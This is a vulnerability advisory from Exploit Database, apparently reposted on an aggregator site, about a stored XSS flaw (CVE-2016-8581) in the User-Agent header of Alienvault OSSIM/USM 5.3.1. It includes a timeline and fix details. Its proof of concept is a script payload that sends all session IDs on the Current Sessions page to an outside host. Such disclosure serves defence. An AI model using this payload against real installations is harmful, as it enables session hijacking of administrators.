Alienvault OSSIM/USM 5.3.1 – Persistent Cross-Site Scripting

• Exploit Database
• 115 阅读

• 作者： Peter Lapp
  日期： 2016-11-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40683/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  Details =======   Product: Alienvault OSSIM/USM Vulnerability: Stored XSS Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8581 CVSS: 3.5 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2       Vulnerability Details =====================   A stored XSS vulnerability exists in the User-Agent header of the login process. It&apos;s possible to inject a script into that header that then gets executed when mousing over the User-Agent field in Settings -> Current Sessions.       POC ===   The POC uses jQuery to send all session IDs on the "Current Sessions" page to an arbitrary site (Google, in this case)   <script>$(&apos;#ops_table .ops_id&apos;).each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>       Timeline ========   08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2       References ==========   https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities